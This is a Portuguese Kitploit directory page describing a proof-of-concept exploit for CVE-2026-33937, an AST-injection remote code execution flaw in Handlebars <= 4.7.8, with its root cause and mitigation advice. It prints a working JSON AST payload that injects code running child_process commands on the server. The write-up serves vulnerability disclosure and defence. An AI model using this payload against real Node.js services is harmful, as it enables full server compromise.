Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-33937 — Prova de conceito de exploit para CVE-2026-33937, uma vulnerabilidade de injeção de AST no Handlebars que leva à execução remota de código no Node.js. Demonstra payloads de AST elaborados e fornece orientações de mitigação. | Kitploit
Ferramentas/GitHubGitHub/dinhvaren/cve-2026-33937
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebDesenvolvimento de Payloads
GitHubdinhvaren/cve-2026-33937

cve-2026-33937

Prova de conceito de exploit para CVE-2026-33937, uma vulnerabilidade de injeção de AST no Handlebars que leva à execução remota de código no Node.js. Demonstra payloads de AST elaborados e fornece orientações de mitigação.

Ver Repositório
há 3 mesesAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-33937 - PoC de Exploração de RCE no Handlebars

Descrição

A CVE-2026-33937 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) no Handlebars causada pelo tratamento inseguro de entrada de Árvore Sintática Abstrata (AST).

A vulnerabilidade permite que atacantes injetem código JavaScript arbitrário ao fornecer um objeto AST manipulado para Handlebars.compile().

Causa Raiz

Handlebars.compile() aceita ambos:

  • String de template
  • Objeto AST pré-analisado

Quando um objeto AST é fornecido, a fase de análise é ignorada.

Dentro de:

root@kitploit:~

lib/handlebars/compiler/javascript-compiler.js

A função:

root@kitploit:~
NumberLiteral(number) {
  this.pushStackLiteral(number.value);
}

insere diretamente number.value no código JavaScript gerado , levando à injeção de código.

sem sanitização ou escape

Impacto

  • Execução Remota de Código (RCE)
  • Comprometimento total do servidor
  • Execução de JavaScript arbitrário no ambiente Node.js

Fluxo de Exploração

root@kitploit:~
Atacante → AST Manipulado (JSON)
        │
        ▼
Handlebars.compile()
        │
        ▼
Compiler.compile()
        │
        ▼
JavaScriptCompiler (injeção de NumberLiteral)
        │
        ▼
Geração de código
        │
        ▼
new Function(...) / eval()
        │
        ▼
       RCE

Prova de Conceito (PoC)

root@kitploit:~
{
  "type": "Program",
  "body": [
    {
      "type": "MustacheStatement",
      "path": {
        "type": "PathExpression",
        "data": false,
        "depth": 0,
        "parts": ["lookup"],
        "original": "lookup",
        "loc": null
      },
      "params": [
        {
          "type": "PathExpression",
          "data": false,
          "depth": 0,
          "parts": [],
          "original": "this",
          "loc": null
        },
        {
          "type": "NumberLiteral",
          "value": "{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //",
          "original": 1,
          "loc": null
        }
      ],
      "escaped": true,
      "strip": { "open": false, "close": false },
      "loc": null
    }
  ],
  "strip": {},
  "loc": null
}

Versões Afetadas

  • Handlebars <= 4.7.8

Mitigação

  • Não permita entrada AST não confiável
  • Valide e sanitize todas as entradas de template
  • Atualize para a versão corrigida do Handlebars

Referências

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-33937
Baixar ferramenta